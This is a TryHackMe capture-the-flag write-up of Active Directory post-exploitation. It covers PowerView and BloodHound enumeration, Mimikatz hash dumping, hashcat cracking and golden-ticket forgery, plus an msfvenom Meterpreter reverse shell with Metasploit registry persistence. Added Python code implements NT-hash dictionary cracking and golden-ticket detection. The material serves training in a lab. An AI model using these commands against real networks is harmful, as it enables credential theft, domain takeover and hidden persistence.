TryHackMe – Post-Exploitation Basics Write-up

1. Introduction

This TryHackMe (THM) room covers the basics of what we usually do after gaining access to a machine in an Active Directory (AD) domain: enumeration with PowerView and BloodHound, dumping password hashes and forging a Golden Ticket with Mimikatz, further information gathering with the built-in Windows Server tools and event logs, and finally persistence with a Metasploit module.

2. Enumeration with Powerview

First, connect to the TryHackMe VPN, then SSH into the given IP address with the supplied credentials.

kali@kali~$ ssh Administrator@10.10.90.150
The authenticity of host '10.10.90.150 (10.10.90.150)' can't be established.
ECDSA key fingerprint is SHA256:jGGFsdyc6+usho+SGSQoG+3agPMuI+Y0SYylUJfLP8s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.90.150' (ECDSA) to the list of known hosts.
Administrator@10.10.90.150's password: P@$$W0rd

Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>

PowerView is a PowerShell script for AD enumeration from the PowerSploit project (it is also bundled with PowerShell Empire). Once we have a foothold on a domain-joined machine, it lets us query users, groups, computers and shares over LDAP without any extra tooling. The creator of this room has already placed PowerView on the target, in the Downloads folder.

First, launch PowerShell with the execution policy bypassed so that we can dot-source the script. Execution policy is not a security boundary; it only stops scripts from running by accident, and "-ep bypass" lifts it for this process only.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> 

Next, dot-source PowerView into the session and enumerate domain users.

PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
PS C:\Users\Administrator> Get-NetUser | select cn

cn                  
--                          
Administrator               
Guest                       
krbtgt                      
Machine-1                   
Admin2                      
Machine-2                   
SQL Service                 
POST{P0W3RV13W_FTW}         
sshd

We can also enumerate domain groups, here filtered on names containing "admin".

PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators 
Hyper-V Administrators         
Storage Replica Administrators 
Schema Admins                  
Enterprise Admins              
Domain Admins                  
Key Admins                     
Enterprise Key Admins       
DnsAdmins

The room also provides a PowerView cheatsheet for the remaining questions.

Questions and answers

What is the shared folder that is not set by default?

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin 
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

Answer:

Share

What operating system is running inside of the network besides Windows Server 2019?

PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem

operatingsystem                  
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Answer:

Windows 10 Enterprise Evaluation

I’ve hidden a flag inside of the users find it

Answer:

POST{P0W3RV13W_FTW} 

3. Enumeration with Bloodhound

BloodHound is a graphical tool that maps the relationships in an AD domain (group membership, sessions, ACLs) as a graph, so that attack paths such as "who can reach Domain Admins" become visible. Its collector, SharpHound, gathers the same kind of data PowerView does (users, groups, computers, sessions) and writes it to JSON files, zipped, for import into BloodHound. The creator of this room has already placed the SharpHound PowerShell wrapper on the target.

Installation

Install Bloodhound on your attacker machine such as Kali.

kali@kali~$ sudo apt-get update && sudo apt-get install bloodhound

Getting loot with Sharphound

First, launch PowerShell from CMD with the execution policy bypassed (skip this if you are still in the PowerShell session from the previous task). Then dot-source the SharpHound script.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
PS C:\Users\Administrator> 

Finally, collect everything SharpHound can gather and have it zipped. Note that SharpHound prefixes the archive name with a timestamp regardless of -ZipFileName, as the output below shows.

PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
----------------------------------------------- 
Initializing SharpHound at 1:33 AM on 1/13/2022
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
[+] Cache File Found! Loaded 104 Objects in cache 

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 92 MB RAM 
Status: 66 objects finished (+66 8)/s -- Using 97 MB RAM 
Enumeration finished in 00:00:00.2933812 
Compressing data to C:\Users\Administrator\20220113013345_loot.zip
You can upload this file directly to the UI 

SharpHound Enumeration Completed at 1:33 AM on 1/13/2022! Happy Graphing!

We can transfer the ZIP file back to the attacking machine with SCP over the same SSH service.

kali@kali~$ scp Administrator@10.10.90.150:20220113013345_loot.zip /tmp/20220113013345_loot.zip
Administrator@10.10.90.150's password: P@$$W0rd
20220113013345_loot.zip

Map the network with Bloodhound

First, start neo4j in one terminal; BloodHound will be started in another.

kali@kali~$ sudo neo4j console

The default neo4j credentials are neo4j:neo4j, and neo4j forces a password change on first login at http://localhost:7474/browser/. Until that is done BloodHound will not be able to authenticate.

Once connected, it will automatically prompt us for a new password. Change to a password you can remember.

Launch Bloodhound.

kali@kali~$ bloodhound

You should now be able to login using the default username and your new password.

Click on the Import Graph button on the right-hand side of Bloodhound window to import the ZIP file. If it does not work (such as bad .JSON file notification), drag and drop the ZIP file into the Bloodhound window.

We can now open the Analysis tab and run any of the pre-built queries we are interested in.

Questions and answers

What service is also a domain admin?

Run "Find all Domain Admins" and hover over the nodes. One of them is the "SQLSERVICE" account, a service account sitting in Domain Admins.

Answer:

SQLSERVICE

What two users are Kerberoastable?

Run "List all Kerberoastable Accounts". This query simply lists user objects that have an SPN set, which is why krbtgt appears as well; in practice its key is long and random, so the only realistic Kerberoasting target here is SQLSERVICE.

Answer:

SQLSERVICE,KRBTGT
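The two pre-built queries above are plain graph walks, and seeing them written out shows why a service account can be "a domain admin" without appearing in the group's direct member list. The following Python is an added example, not code from this write-up or from BloodHound, and it runs over a constructed, simplified snapshot of this room's domain (not SharpHound's real JSON schema): nested group membership is resolved transitively, the way BloodHound's MemberOf*1.. pattern does, and the Kerberoastable query is just "user objects with hasspn=true", which is why krbtgt is listed.

```python
"""Added example: BloodHound's "Find all Domain Admins" and "List all
Kerberoastable Accounts" queries, computed by hand over a constructed,
simplified snapshot of this room's domain (not SharpHound's JSON schema)."""
from collections import deque

DOMAIN = "CONTROLLER.LOCAL"


def bh_name(name):
    """BloodHound-style principal name: upper-cased SAM name @ domain."""
    return f"{name.upper()}@{DOMAIN}"


# Constructed data: group -> direct members, which may themselves be groups.
GROUP_MEMBERS = {
    bh_name("Administrators"): [bh_name("Domain Admins"), bh_name("Enterprise Admins"),
                                bh_name("Administrator")],
    bh_name("Domain Admins"): [bh_name("Administrator"), bh_name("SQLService")],
    bh_name("Enterprise Admins"): [bh_name("Administrator")],
    bh_name("Domain Users"): [bh_name(u) for u in
                              ("Administrator", "krbtgt", "Machine1", "Admin2", "Machine2", "SQLService")],
}

# Constructed user properties: the two attributes the Kerberoastable query keys on.
USERS = {
    bh_name("Administrator"): {"hasspn": False, "enabled": True},
    bh_name("krbtgt"):        {"hasspn": True,  "enabled": False},
    bh_name("Machine1"):      {"hasspn": False, "enabled": True},
    bh_name("Admin2"):        {"hasspn": False, "enabled": True},
    bh_name("Machine2"):      {"hasspn": False, "enabled": True},
    bh_name("SQLService"):    {"hasspn": True,  "enabled": True},
}


def effective_members(group, group_members=GROUP_MEMBERS):
    """Every user reachable from `group` through any depth of nesting (cycle-safe).
    This is the MemberOf*1.. walk behind "Find all Domain Admins"."""
    seen, users, queue = {group}, set(), deque([group])
    while queue:
        for member in group_members.get(queue.popleft(), []):
            if member in group_members:        # nested group: keep walking
                if member not in seen:
                    seen.add(member)
                    queue.append(member)
            else:                              # leaf principal
                users.add(member)
    return users


def membership_path(principal, group, group_members=GROUP_MEMBERS):
    """Shortest chain principal -> ... -> group, like BloodHound's path display;
    None if the principal is not (transitively) a member."""
    parents = {}                               # member -> groups containing it directly
    for g, members in group_members.items():
        for m in members:
            parents.setdefault(m, []).append(g)
    prev, queue = {principal: None}, deque([principal])
    while queue:
        node = queue.popleft()
        if node == group:
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for parent in parents.get(node, []):
            if parent not in prev:
                prev[parent] = node
                queue.append(parent)
    return None


def kerberoastable(users=USERS, include_disabled=True):
    """BloodHound's query is just 'User with hasspn=true', so krbtgt shows up;
    dropping disabled accounts is a filter the operator applies afterwards."""
    return sorted(u for u, p in users.items()
                  if p["hasspn"] and (include_disabled or p["enabled"]))


if __name__ == "__main__":
    da = bh_name("Domain Admins")
    for user in sorted(effective_members(da)):
        print("Domain Admin:", user, "via", " -> ".join(membership_path(user, da)))
    print("Kerberoastable:", kerberoastable())
```

The same walk, run against the Administrators group, is how BloodHound shows SQLSERVICE reaching the built-in Administrators group through Domain Admins.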

4. Dumping hashes with mimikatz

Mimikatz is the standard tool for dumping credentials from Windows and for abusing Kerberos (silver and golden tickets among other things). Here we ask the Local Security Authority (LSA) on the domain controller for every account's NTLM hash; on a DC these are the domain hashes held in NTDS.dit, which is why "lsadump::lsa /patch" lists every domain user. (The "LSA secrets" proper, stored under HKLM\SECURITY\Policy\Secrets, hold service-account passwords and other machine secrets and are read with "lsadump::secrets" instead.) The creator of this room has already placed Mimikatz on the target.

Dump hashes

Launch Mimikatz from the Downloads folder and run "privilege::debug"; the output must be "Privilege '20' OK", meaning SeDebugPrivilege was enabled. Mimikatz has to run from an elevated (administrator) shell for this to work; the SSH session on this box lands us in one directly.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51              
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                    
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/ 

mimikatz # privilege::debug
Privilege '20' OK 
                  
mimikatz # 

We can now dump the hashes.

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105) 
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
...

Cracking those hashes with hashcat

As the question asks us to crack Machine1's hash, I will crack that one instead of the Administrator hash used in the THM example.

First, unzip the rockyou wordlist, which ships compressed on Kali.

kali@kali~$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz

I stored the hashes of Machine1 and Machine2 in hash.txt, one per line. Finally, crack them; -m 1000 is hashcat's NTLM (NT hash) mode.

kali@kali~$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
...
64f12cddaa88057e06a81b54e73b949b:Password1
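To see what hashcat -m 1000 actually does, and to turn the mimikatz dump into the pwdump format that hashcat and secretsdump-style readers expect, here is an added Python example (not code from this write-up, nor from hashcat or mimikatz). The NT hash is MD4 over the UTF-16LE encoding of the password with no salt; MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds. The lsadump excerpt and the wordlist are constructed for the example; the Machine1 hash is the one dumped above.

```python
"""Added example: what `hashcat -m 1000` does, from the mimikatz dump to the
cracked password. The NT hash is unsalted MD4 over the UTF-16LE password;
MD4 is implemented inline because hashlib often lacks it on OpenSSL 3."""
import re
import struct

# Constructed excerpt in the shape of the `lsadump::lsa /patch` output above.
LSADUMP_OUTPUT = """\
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
"""

# Constructed stand-in for rockyou.txt; the empty candidate catches blank passwords.
WORDLIST = ["", "123456", "password", "letmein", "Password1", "Summer2022"]

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" (blank password)
MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: three rounds of sixteen steps over each 64-byte block."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (mixing function, message-word order, shifts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, const in rounds:
            for i, w in enumerate(order):
                t = (a + fn(b, c, d) + words[w] + const) & MASK32
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c   # next step updates "d"
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so equal passwords share a hash."""
    return md4(password.encode("utf-16le")).hex()


# One dump record: RID line, user line, LM line, NTLM line (hash fields may be blank).
_RECORD = re.compile(
    r"RID[ \t]*:[ \t]*[0-9a-fA-F]+[ \t]*\((\d+)\)[ \t]*\r?\n"
    r"User[ \t]*:[ \t]*(.+?)[ \t]*\r?\n"
    r"LM[ \t]*:[ \t]*([0-9a-fA-F]{32})?[ \t]*\r?\n"
    r"NTLM[ \t]*:[ \t]*([0-9a-fA-F]{32})?"
)


def parse_lsadump(text):
    """[(user, rid, lm_hex or None, nt_hex or None)] in dump order."""
    return [(user, int(rid), lm.lower() or None, nt.lower() or None)
            for rid, user, lm, nt in _RECORD.findall(text)]


def to_pwdump(entries):
    """pwdump lines (user:rid:lm:nt:::); blank fields get the well-known empty
    hashes so hashcat/secretsdump-style readers accept them."""
    return [f"{u}:{rid}:{lm or EMPTY_LM}:{nt or EMPTY_NT}:::" for u, rid, lm, nt in entries]


def crack(entries, wordlist):
    """Dictionary attack: hash each candidate once, look it up against every target."""
    targets = {}
    for user, _rid, _lm, nt in entries:
        targets.setdefault(nt or EMPTY_NT, []).append(user)
    found = {}
    for candidate in wordlist:
        for user in targets.get(nt_hash(candidate), []):
            found[user] = candidate
    return found


if __name__ == "__main__":
    entries = parse_lsadump(LSADUMP_OUTPUT)
    print("\n".join(to_pwdump(entries)))
    print(crack(entries, WORDLIST))   # {'Guest': '', 'Machine1': 'Password1'}
```

Because the hash is unsalted, one MD4 per candidate covers every target at once, which is why hashcat chews through rockyou against a whole domain dump in seconds; the blank-NT placeholder is also why a disabled account such as Guest "cracks" to the empty string.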

Questions and answers

What is the Machine1 password?

Password1

What is the Machine2 Hash?

c39f2beb3d2ec06a62cb887fb391dee0

5. Golden Ticket Attacks with mimikatz

When we dumped the hashes earlier, one of them belonged to the krbtgt account. Every TGT the KDC issues is encrypted, and its PAC signed, with the krbtgt account's key; for the RC4-HMAC encryption type that key is simply the account's NT hash (mimikatz prints it as "rc4_hmac_nt" below). So with the domain SID and the krbtgt NT hash we can forge our own TGT for any user with any group memberships we like, a so-called golden ticket, and present it to any service in the domain. The forged user does not even have to exist, although the KDC rejects tickets for unknown accounts once they are more than 20 minutes old, and the ticket stays usable until the krbtgt password has been changed twice.

We need to RDP into the target for this task because, after forging the ticket, we will spawn a new command window whose logon session carries the ticket; that elevated shell cannot be opened from the SSH session.

kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150

Dump krbtgt’s hash

First, launch Mimikatz from the administrator shell and enable debug privilege with "privilege::debug".

C:\Users\Administrator>cd Downloads && mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51              
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                               
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )  
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                    
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/ 

mimikatz # privilege::debug 
Privilege '20' OK 
                  
mimikatz # 

We can now dump the krbtgt account's hash by name.

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 
                                                              
RID  : 000001f6 (502)                                         
User : krbtgt                                                
                                                              
 * Primary                                                    
    NTLM : 5508500012cc005cf7082a9a89ebdfdf                   
    LM   :                                                    
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf                 
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf                 
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

Create a golden ticket

The ticket can carry any username; only the domain name, the domain SID (the S-1-5-21-... value printed by lsadump, without a trailing RID) and the krbtgt NT hash have to be right. I will use "Administrator" with /id:500, the RID of the built-in Administrator account. By default mimikatz also puts RIDs 513, 512, 520, 518 and 519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins) into the PAC, which is what gives the ticket full control of the forest.

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 1/13/2022 7:15:55 PM ; 1/11/2032 7:15:55 PM ; 1/11/2032 7:15:55 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed 
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
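The ticket mimikatz just wrote has a ten-year lifetime and an RC4 key, both far from what a real KDC hands out, and those are exactly the properties a defender (or you, checking your own tradecraft before moving) can look for in a host's ticket cache. The following Python is an added example, not part of this write-up: it parses klist-style output (the text is constructed to mirror the ticket above, not captured from the room) and flags TGTs whose lifetime exceeds the AD default of 10 hours, whose renewal window exceeds the 7-day default, or whose encryption type is RC4. Bear in mind that mimikatz's /endin and /renewmax options let an attacker pick a policy-conformant lifetime, so the lifetime checks only catch defaults.

```python
"""Added example: flag cached Kerberos TGTs with golden-ticket traits. Input is
klist-style text, constructed here to mirror the forged ticket above."""
import re
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)   # AD default "Maximum lifetime for user ticket"
MAX_RENEW_WINDOW = timedelta(days=7)     # AD default "Maximum lifetime for user ticket renewal"
TIME_FMT = "%m/%d/%Y %H:%M:%S"

# Constructed klist output: #0 mirrors the mimikatz ticket, #1 is a normal TGT.
KLIST_SAMPLE = """\
#0>     Client: Administrator @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 1/13/2022 19:15:55 (local)
        End Time:   1/11/2032 19:15:55 (local)
        Renew Time: 1/11/2032 19:15:55 (local)

#1>     Client: Machine1 @ CONTROLLER.LOCAL
        Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 1/13/2022 19:20:01 (local)
        End Time:   1/14/2022 5:20:01 (local)
        Renew Time: 1/20/2022 19:20:01 (local)
"""

_TICKET = re.compile(
    r"#\d+>\s*Client:[ \t]*(?P<client>.+?)[ \t]*\n"
    r"\s*Server:[ \t]*(?P<server>.+?)[ \t]*\n"
    r"\s*KerbTicket Encryption Type:[ \t]*(?P<etype>.+?)[ \t]*\n"
    r".*?Start Time:[ \t]*(?P<start>\S+ \S+)"
    r".*?End Time:[ \t]*(?P<end>\S+ \S+)"
    r".*?Renew Time:[ \t]*(?P<renew>\S+ \S+)",
    re.DOTALL,
)


def parse_klist(text):
    """One dict per cached ticket: client, server, etype and start/end/renew times."""
    tickets = []
    for m in _TICKET.finditer(text):
        tickets.append({
            "client": m["client"], "server": m["server"], "etype": m["etype"],
            "start": datetime.strptime(m["start"], TIME_FMT),
            "end": datetime.strptime(m["end"], TIME_FMT),
            "renew": datetime.strptime(m["renew"], TIME_FMT),
        })
    return tickets


def golden_indicators(ticket, max_lifetime=MAX_TGT_LIFETIME, max_renew=MAX_RENEW_WINDOW):
    """Reasons a TGT looks forged; [] means nothing stood out. Only TGTs
    (server krbtgt/...) are judged; service tickets are returned as clean."""
    if not ticket["server"].lower().startswith("krbtgt/"):
        return []
    reasons = []
    lifetime = ticket["end"] - ticket["start"]
    if lifetime > max_lifetime:
        reasons.append(f"lifetime {lifetime} exceeds policy maximum {max_lifetime}")
    if ticket["renew"] - ticket["start"] > max_renew:
        reasons.append(f"renewable beyond the {max_renew} policy window")
    if "RC4" in ticket["etype"].upper():
        # mimikatz defaults to RC4 when fed an NT hash; legitimate AES-capable
        # domains issue AES TGTs, so an RC4 TGT there deserves a second look
        reasons.append("RC4-HMAC TGT in a domain that issues AES tickets")
    return reasons


def suspicious_tickets(text):
    """client -> indicator list for every cached ticket that tripped a check."""
    flagged = {}
    for ticket in parse_klist(text):
        reasons = golden_indicators(ticket)
        if reasons:
            flagged[ticket["client"]] = reasons
    return flagged


if __name__ == "__main__":
    for client, reasons in suspicious_tickets(KLIST_SAMPLE).items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```

The same three checks translate directly to the DC side: a 4769/4768 stream where a "user" never authenticated (no 4768) yet requests service tickets, or where an AES-capable domain suddenly sees RC4 TGTs, is the event-log equivalent of what this script reads from the cache.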

Using the Golden Ticket to access other machine

Next, inject the ticket and spawn a new command window from Mimikatz. Note that without "/ptt", "kerberos::golden" only writes ticket.kirbi to disk; load it into the current logon session with "kerberos::ptt ticket.kirbi" (or append /ptt to the golden command) before this step.

mimikatz # misc::cmd

In the new window, "klist" should list the forged TGT, and in principle "psexec.exe \\Desktop-1 cmd.exe" would use it to open a shell on another host. However, this room only has the one machine, so the golden ticket cannot be tried laterally here.

6. Enumerating with Server Manager

To use Server Manager we must RDP into the target; as in task 5, rdesktop works.

kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150

Enumeration with Server Manager

The Manage menu in Server Manager lets us add roles and features, but doing that on a compromised server is noisy and a sysadmin will notice. The roles already installed here (AD CS, AD DS, DNS, File and Storage Services) are not where this task's answers are; the Tools menu is.

Navigate to the Tools tab and select “Active Directory Users and Computers”.

Here we can browse every domain user and group. Check the Description field of accounts: admins sometimes leave passwords there, and that is where the SQL Service account's password for this task is found.

Questions and answers

What tool allows to view the event logs?

Event Viewer

What is the SQL Service password?

MYpassword123#

7. Maintaining Access

There are many ways to maintain access on a machine; this room uses the Metasploit persistence module, which first needs a Meterpreter session on the target.

Generate meterpreter reverse shell

First, generate a Windows Meterpreter reverse TCP payload. LHOST is the address the target will call back to; on THM that is your VPN (tun0) address, and it must be reachable from the target.

kali@kali~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.2 LPORT=5555 -f exe -o shell.exe

Transfer payload shell file

Transfer the payload to the target with SCP over the same SSH service, then SSH in and confirm it arrived.

kali@kali~$ scp shell.exe Administrator@10.10.90.150:shell.exe
Administrator@10.10.90.150's password: P@$$W0rd
shell.exe

kali@kali~$ ssh Administrator@10.10.90.150
Administrator@10.10.90.150's password: P@$$W0rd

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir
 Volume in drive C has no label.                                 
 Volume Serial Number is F83F-6346                               
                                                                 
 Directory of C:\Users\Administrator                             
                                                                 
01/13/2022  08:36 PM    <DIR>          .                         
01/13/2022  08:36 PM    <DIR>          ..                        
05/13/2020  07:01 PM    <DIR>          3D Objects                
05/13/2020  07:01 PM    <DIR>          Contacts                  
05/13/2020  07:01 PM    <DIR>          Desktop                   
05/14/2020  07:27 PM    <DIR>          Documents                 
01/13/2022  07:50 PM    <DIR>          Downloads                 
05/13/2020  07:01 PM    <DIR>          Favorites                 
05/13/2020  07:01 PM    <DIR>          Links                     
05/13/2020  07:01 PM    <DIR>          Music                     
05/13/2020  07:01 PM    <DIR>          Pictures                  
05/13/2020  07:01 PM    <DIR>          Saved Games               
05/13/2020  07:01 PM    <DIR>          Searches                  
01/13/2022  08:36 PM            73,802 shell.exe                 
05/13/2020  07:01 PM    <DIR>          Videos

Start a listener and receive a shell

Launch Metasploit with "msfconsole" and use "exploit/multi/handler" to catch the incoming reverse shell.

kali@kali~$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > 

Set the payload to match what msfvenom built (if the handler did not already pick it, run "set payload windows/meterpreter/reverse_tcp"), fill in LHOST and LPORT exactly as in the msfvenom command, and run it. LHOST is the attacking machine's IP address.

msf6 exploit(multi/handler) > set LHOST 192.168.126.2
LHOST => 192.168.126.2
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run

Run shell.exe from the SSH session on the target; the handler should receive a connection. Background the Meterpreter session if Metasploit drops you straight into it.

meterpreter> bg
msf6 exploit(multi/handler) > 

Run the persistence module

The persistence module plants a payload that calls back on every boot (by default a script in the user's temp directory launched from a registry Run key), so we get a session back even after the machine reboots. Set SESSION to the ID of our Meterpreter session; the "sessions" command lists them if you are unsure. The module also runs the planted payload immediately, so a new session appears on the handler. Keep the cleanup resource script the module prints so the implant can be removed at the end of the engagement.

msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(windows/local/persistence) > set session 1
msf6 exploit(windows/local/persistence) > run
meterpreter>

There we go, we now obtained persistence in the victim’s machine.

I hope this article has been helpful to you.